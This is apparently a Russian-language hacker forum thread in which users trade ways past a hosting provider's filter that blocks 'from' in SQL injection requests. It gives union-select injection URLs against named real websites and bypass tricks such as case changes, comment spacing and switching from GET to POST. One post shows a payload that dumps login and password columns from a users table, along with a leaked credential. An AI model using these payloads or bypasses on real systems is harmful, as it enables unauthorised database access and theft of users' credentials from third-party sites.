Капался на просторах интернета и наткнулся на скул. Инъекция, как инъекция, даже ковычки не экранируются, но вот косяк, что фильтруется слово from. Ну и стал думать, как можно обойти фильтрацию. Долго не думал, потому что нечто подобное уже делали с пхп. Надо как-то зашифровать и потом расшифровать строку. Чем я и занялся. Покопался на разных ресурсах по MySQL и нашел несколько функций кодировки/декодировки строк. Начал экспериментировать. На моё удивление получилось следующее: при подстановке PHP: -1+union+select+des_encrypt(database(),'3')+/* выводилась строка "яcЌцI{ПџwЊ)яVeЖ…" далее подставляя PHP: -1+union+select+des_decrypt('яcЌцI{ПџwЊ)яVeЖ…','3')+/* На экране появлялась версия дб... Поэкпериментировав на локальном серве денвера получил следующее PHP: mysql> select aes_encrypt(version(),'12'); +-----------------------------+ | aes_encrypt(version(),'12') | +-----------------------------+ | └/Ь0⌂Ва{ў_wВ╢ьДО | +-----------------------------+ 1 row in set (0.00 sec) mysql> select aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12'); +--------------------------------------+ | aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12') | +--------------------------------------+ | 4.1.16-max | +--------------------------------------+ 1 row in set (0.00 sec) mysql> select ENCODE(user(),'2'); +--------------------+ | ENCODE(user(),'2') | +--------------------+ | рL♂3М▬Яч╣,↓Gєs | +--------------------+ 1 row in set (0.00 sec) mysql> select decode('рL♂3М▬Яч╣,↓Gєs','2'); +------------------------------+ | decode('рL♂3М▬Яч╣,↓Gєs','2') | +------------------------------+ | ODBC@localhost | +------------------------------+ 1 row in set (0.00 sec) mysql> Главное не потерять ни одного символа. Но цели я своей так и не добился, нифига пока не обошёл фильтрацию...Вот собственно вопрос: КАК?!!??! Как это можно использовать?
ну если фильтруется from, то вариант это использование подзапросов, далее надо поэксперементировать как именно фильтруется from, может быть фильтруется только в нижнем регистре, тогда можно попробовать FROM, иногда бывает фильтрация и верхний и нижний регистр фильтруется (как не странно видел один раз такое не с FROM конечно, но это не важно, тупость остается тупостью, конечно легче перевести $_REQUEST в нижний регистр и проверить на from, но фиг знает что употреблял кодер, на момент написания скрипта), тогда можно FrOm попробовать. from может фильтроваться с пробелом напимер " From" или "from ", тогда пробелы можно заменить на /**/ например так : а aes_encrypt, в связке с aes_decrypt используется для обхода ошибок связанных с кодировкой, т.е. в aes_encrypt ты посылаешь какоето значение (например результат выполнения функции version()) ну и ключ шифрования т.к. aes - алгоритм симметричного шифрования и ты знаешь ключ, то ты сразу же можешь зашифрованное значение расшифровать с помощью aes_decrypt но выведет результат эта функция уже в правильной кодировке, т.е. общая формула такая M=Dk(Ek(M)), M - открытый текст, Ek - функция зашифровки с ключем k, Dk -функция расшифровки с ключем k, т.е. при этом aes_decrypt(aes_encrypt(version(),0x71),0x71) дает результат в "своей", т.е. в нужной кодировке, обычно для этого эти функции и используют, пример выдаст версию mysql
Фильтруется from в любом известном проявлении в GET запросе, даже в случае "-1+union+select+'from'+/*" ... А про декрипт/инкрипт уже сам допёр. Но к сожалению это очень врядли можно использовать чтобы обойти эту фильтрацию...ибо user(), как я узнал, является в мускуле лишь строковой переменной, а если криптовать/декриптовать 'from' то вместо того, что нужно получится лишь ошибка Да собственно вот ссылка, мне уже просто интересно, кто-ибудь обойдёт фильтрацию!? Отпишитесь тут плз...оч прошу. www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+user()+/*
фильтруется только гет запрос, щас проверил, через пост всёнормально отправляется Юзай Post =) ЗЫ Это sweb хостинг, его защита легко обходится заменив GET запрос на POST Тут на форуме есть скрипт от Мэднета, вот залил что бы не искать http://ziroday.narod.ru/post.php
Вот не фильтруется нифига: http://www.internatura.ru/index.php?op=cat&sec=24&gn=5785+order+by+1/*from*//* у меня плохо работающий жопорез, поэтому раскрутить не получится, а вобще это показывает, что from не фильтруется
Scipio, ты не совсем прав Например http://www.internatura.ru/index.php?op=cat&sec=24&gn=5785+order+by+from/* тоже не фильтруется, но при www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+user()+from+mda/* перекидывает на sweb, это их знаменитая хэк защита, которая (как я написал выше) обходится отправиь запрос методом пост
Довольно интересно...)) Запрос откидывается, если в запросе (масло маслянное) присутствуют Union, Select, From, именно в такой последовательности... Тут думаю или пост, или пробовать подзапросы
угу, когда пробовал меня на sweb не перекинуло, поэтому не заметил, сейчас посмотрел, ты прав абсолютно, мля пров достал уже с профилактикой, а жопрез у нас работает через свое название
Да йопт, чё пробовать то))) Пост работает, сам проверял Кстати там ещё фильтруется слово /etc/passwd Вобщем вот http://www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+concat_ws(':',login,password)+from+users/* viktor:1940
Spyder, прсто respect!!! Пост запросом имхо лучше через inetcrack пользоваться Скопировал хеад от гета, заменил метод и чуть подправил
На одном из серверов Sweb-a фильтруется даже select from, например http://www.74region.ru/?select%20from , а на некоторых не фильтруется последовательность "select, from, union, select".
Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд
На нкоторых серверах sweb не фильтруется "from". Пример. http://1-avto.com/car.html?select%20from не фильтруется а http://1-avto.com/car.html?union%20select%20from фильтруется. А по поводу пост запросов и т.д., в некоторых скриптах только гет проходит.